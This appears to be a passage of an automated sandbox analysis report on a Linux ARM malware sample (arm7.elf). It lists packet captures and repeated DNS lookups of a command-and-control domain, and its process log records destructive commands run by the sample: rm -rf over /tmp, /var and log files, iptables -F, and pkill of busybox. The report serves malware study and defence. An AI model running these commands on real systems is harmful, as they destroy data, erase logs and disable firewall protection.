                                                                    Oct 6, 2024 15:53:13.699979067 CEST436608443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:13.704796076 CEST844343660156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:13.704864025 CEST436608443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:13.709686041 CEST844343660156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:14.289938927 CEST844343660156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:14.290112972 CEST436608443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:14.295010090 CEST844343660156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:14.454480886 CEST436628443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:14.459640980 CEST844343662156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:14.459882975 CEST436628443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:14.468903065 CEST436628443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:14.473817110 CEST844343662156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:14.473911047 CEST436628443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:14.478738070 CEST844343662156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:15.061335087 CEST844343662156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:15.061456919 CEST436628443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:15.066355944 CEST844343662156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:15.303411961 CEST436648443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:15.308356047 CEST844343664156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:15.308451891 CEST436648443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:15.311748028 CEST436648443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:15.316617012 CEST844343664156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:15.316690922 CEST436648443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:15.321522951 CEST844343664156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:16.074111938 CEST436668443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:16.079039097 CEST844343666156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:16.079122066 CEST436668443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:16.083766937 CEST436668443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:16.088622093 CEST844343666156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:16.088680983 CEST436668443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:16.093528032 CEST844343666156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:16.698574066 CEST844343666156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:16.698734999 CEST436668443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:16.703624964 CEST844343666156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:17.701330900 CEST436688443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:17.706310987 CEST844343668156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:17.706393003 CEST436688443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:17.709614992 CEST436688443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:17.714483976 CEST844343668156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:17.714559078 CEST436688443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:17.719532967 CEST844343668156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:18.278351068 CEST844343668156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:18.278518915 CEST436688443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:18.283380032 CEST844343668156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:19.306677103 CEST436708443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:19.311609030 CEST844343670156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:19.311669111 CEST436708443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:19.314935923 CEST436708443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:19.319819927 CEST844343670156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:19.319866896 CEST436708443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:19.324743032 CEST844343670156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:19.878334045 CEST844343670156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:19.878489017 CEST436708443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:19.883421898 CEST844343670156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:20.891690969 CEST436728443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:20.896838903 CEST844343672156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:20.897166014 CEST436728443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:20.900079012 CEST436728443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:20.904906034 CEST844343672156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:20.905057907 CEST436728443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:20.909892082 CEST844343672156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:21.636564970 CEST844343672156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:21.636816025 CEST436728443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:21.641730070 CEST844343672156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:22.655109882 CEST436748443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:22.660070896 CEST844343674156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:22.660219908 CEST436748443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:22.666996002 CEST436748443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:22.671961069 CEST844343674156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:22.672039986 CEST436748443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:22.680425882 CEST844343674156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:23.828560114 CEST844343674156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:23.828668118 CEST436748443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:23.828704119 CEST436748443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:23.829159021 CEST844343674156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:23.829214096 CEST436748443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:23.829303026 CEST844343674156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:23.829344034 CEST436748443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:24.038604975 CEST844343674156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:30.326714993 CEST436648443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:30.331757069 CEST844343664156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:30.486948013 CEST844343664156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:30.487025976 CEST436648443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:49.857484102 CEST436768443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:49.862498045 CEST844343676156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:49.862612963 CEST436768443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:49.866254091 CEST436768443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:49.871094942 CEST844343676156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:49.871136904 CEST436768443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:49.875974894 CEST844343676156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:50.441231966 CEST844343676156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:50.441386938 CEST436768443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:50.446331978 CEST844343676156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:51.480355978 CEST436788443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:51.485974073 CEST844343678156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:51.486062050 CEST436788443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:51.492594957 CEST436788443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:51.497472048 CEST844343678156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:51.497556925 CEST436788443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:51.502386093 CEST844343678156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:52.055897951 CEST844343678156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:52.056097031 CEST436788443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:52.060952902 CEST844343678156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:53.062242985 CEST436808443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:53.067130089 CEST844343680156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:53.067239046 CEST436808443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:53.074801922 CEST436808443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:53.079739094 CEST844343680156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:53.079879045 CEST436808443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:53.084728003 CEST844343680156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:53.648680925 CEST844343680156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:53.648828030 CEST436808443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:53.653656960 CEST844343680156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:54.651566982 CEST436828443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:54.656584024 CEST844343682156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:54.656642914 CEST436828443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:54.660243034 CEST436828443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:54.665111065 CEST844343682156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:54.665160894 CEST436828443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:54.670016050 CEST844343682156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:55.233927011 CEST844343682156.238.224.214192.168.2.13
                                                                    Oct 6, 2024 15:53:55.234062910 CEST436828443192.168.2.13156.238.224.214
                                                                    Oct 6, 2024 15:53:55.238945007 CEST844343682156.238.224.214192.168.2.13

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 6, 2024 15:52:20.463788033 CEST4233553192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:52:21.164012909 CEST5625153192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:52:25.470573902 CEST5433953192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:52:26.170196056 CEST4423053192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:52:30.476373911 CEST4261453192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:52:31.174022913 CEST4681353192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:52:35.481823921 CEST3796653192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:52:36.177680969 CEST4547353192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:52:40.488213062 CEST4942353192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:52:41.182724953 CEST5306253192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:52:48.664458036 CEST3291153192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:52:49.432076931 CEST5051353192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:52:53.670348883 CEST4512153192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:52:54.437803984 CEST5293853192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:52:58.674613953 CEST4142653192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:52:59.443326950 CEST5440153192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:53:03.679779053 CEST5268653192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:53:04.445933104 CEST4997953192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:53:08.686322927 CEST5242953192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:53:09.449548006 CEST3342153192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:53:15.293555021 CEST3916653192.168.2.13195.10.195.195
                                                                    Oct 6, 2024 15:53:15.301929951 CEST5339166195.10.195.195192.168.2.13
                                                                    Oct 6, 2024 15:53:16.064469099 CEST4396153192.168.2.13195.10.195.195
                                                                    Oct 6, 2024 15:53:16.072113991 CEST5343961195.10.195.195192.168.2.13
                                                                    Oct 6, 2024 15:53:19.282411098 CEST4967953192.168.2.1351.77.149.139
                                                                    Oct 6, 2024 15:53:19.306195974 CEST534967951.77.149.139192.168.2.13
                                                                    Oct 6, 2024 15:53:20.881123066 CEST5029353192.168.2.13194.36.144.87
                                                                    Oct 6, 2024 15:53:20.891033888 CEST5350293194.36.144.87192.168.2.13
                                                                    Oct 6, 2024 15:53:22.639765978 CEST3669553192.168.2.13134.195.4.2
                                                                    Oct 6, 2024 15:53:22.654321909 CEST5336695134.195.4.2192.168.2.13
                                                                    Oct 6, 2024 15:53:24.837528944 CEST5324753192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:53:29.842262030 CEST4518053192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:53:34.846637964 CEST4194053192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:53:39.850909948 CEST5448053192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:53:44.854357958 CEST4897953192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:53:51.446160078 CEST3297653192.168.2.13185.181.61.24
                                                                    Oct 6, 2024 15:53:51.479425907 CEST5332976185.181.61.24192.168.2.13
                                                                    Oct 6, 2024 15:53:56.236135960 CEST4900553192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:54:01.241420031 CEST5140353192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:54:06.246423960 CEST4624853192.168.2.13178.254.22.166
                                                                    Oct 6, 2024 15:54:11.249376059 CEST4212153192.168.2.13178.254.22.166

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Oct 6, 2024 15:52:20.463788033 CEST192.168.2.13178.254.22.1660xed0cStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:52:21.164012909 CEST192.168.2.13178.254.22.1660xed0cStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:52:25.470573902 CEST192.168.2.13178.254.22.1660xed0cStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:52:26.170196056 CEST192.168.2.13178.254.22.1660xed0cStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:52:30.476373911 CEST192.168.2.13178.254.22.1660xed0cStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:52:31.174022913 CEST192.168.2.13178.254.22.1660xed0cStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:52:35.481823921 CEST192.168.2.13178.254.22.1660xed0cStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:52:36.177680969 CEST192.168.2.13178.254.22.1660xed0cStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:52:40.488213062 CEST192.168.2.13178.254.22.1660xed0cStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:52:41.182724953 CEST192.168.2.13178.254.22.1660xed0cStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:52:48.664458036 CEST192.168.2.13178.254.22.1660xe0d6Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:52:49.432076931 CEST192.168.2.13178.254.22.1660xe0d6Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:52:53.670348883 CEST192.168.2.13178.254.22.1660xe0d6Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:52:54.437803984 CEST192.168.2.13178.254.22.1660xe0d6Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:52:58.674613953 CEST192.168.2.13178.254.22.1660xe0d6Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:52:59.443326950 CEST192.168.2.13178.254.22.1660xe0d6Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:53:03.679779053 CEST192.168.2.13178.254.22.1660xe0d6Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:53:04.445933104 CEST192.168.2.13178.254.22.1660xe0d6Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:53:08.686322927 CEST192.168.2.13178.254.22.1660xe0d6Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:53:09.449548006 CEST192.168.2.13178.254.22.1660xe0d6Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:53:15.293555021 CEST192.168.2.13195.10.195.1950x33ffStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:53:16.064469099 CEST192.168.2.13195.10.195.1950x33ffStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:53:19.282411098 CEST192.168.2.1351.77.149.1390xecdStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:53:20.881123066 CEST192.168.2.13194.36.144.870x3704Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:53:22.639765978 CEST192.168.2.13134.195.4.20xa3c7Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:53:24.837528944 CEST192.168.2.13178.254.22.1660xc028Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:53:29.842262030 CEST192.168.2.13178.254.22.1660xc028Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:53:34.846637964 CEST192.168.2.13178.254.22.1660xc028Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:53:39.850909948 CEST192.168.2.13178.254.22.1660xc028Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:53:44.854357958 CEST192.168.2.13178.254.22.1660xc028Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:53:51.446160078 CEST192.168.2.13185.181.61.240xffbaStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:53:56.236135960 CEST192.168.2.13178.254.22.1660x3587Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:54:01.241420031 CEST192.168.2.13178.254.22.1660x3587Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:54:06.246423960 CEST192.168.2.13178.254.22.1660x3587Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:54:11.249376059 CEST192.168.2.13178.254.22.1660x3587Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Oct 6, 2024 15:53:15.301929951 CEST195.10.195.195192.168.2.130x33ffNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:53:16.072113991 CEST195.10.195.195192.168.2.130x33ffNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:53:19.306195974 CEST51.77.149.139192.168.2.130xecdNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:53:20.891033888 CEST194.36.144.87192.168.2.130x3704No error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:53:22.654321909 CEST134.195.4.2192.168.2.130xa3c7No error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                    Oct 6, 2024 15:53:51.479425907 CEST185.181.61.24192.168.2.130xffbaNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false

                                                                    System Behavior

                                                                    General

                                                                    Start time (UTC):13:51:52
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:/tmp/arm7.elf
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:51:52
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:51:52
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:51:52
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:51:52
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/bin/rm
                                                                    Arguments:rm -rf /tmp/arm7.elf /tmp/config-err-IN1GlB /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap-private-tmp /tmp/snap.lxd /tmp/ssh-ntFb5z3TQVeu /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-ModemManager.service-rehHTg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-PB7Ovf /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-rnzw4f /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-switcheroo-control.service-jxKacf /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-WfFmsi /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-resolved.service-9mYjrg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-timedated.service-Ylvv8i /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-upower.service-VKEayg /tmp/vmware-root_727-4290690966 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-ModemManager.service-rJRv0g /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-2NWDdf /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-WNhjUf /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-switcheroo-control.service-YlFEtg /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-VhFl6g /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-resolved.service-GDC7pj /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-timedated.service-NgTmVe /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-upower.service-FqJmSi /var/log/wtmp
                                                                    File size:72056 bytes
                                                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:51:57
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:51:57
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c "rm -rf /tmp/*"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:51:57
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:51:57
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/bin/rm
                                                                    Arguments:rm -rf /tmp/*
                                                                    File size:72056 bytes
                                                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:51:57
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:51:57
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c "iptables -F"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:51:57
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:51:57
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/sbin/iptables
                                                                    Arguments:iptables -F
                                                                    File size:99296 bytes
                                                                    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:51:58
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:51:58
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c "pkill -9 busybox"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:51:58
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:51:58
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/bin/pkill
                                                                    Arguments:pkill -9 busybox
                                                                    File size:30968 bytes
                                                                    MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:00
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
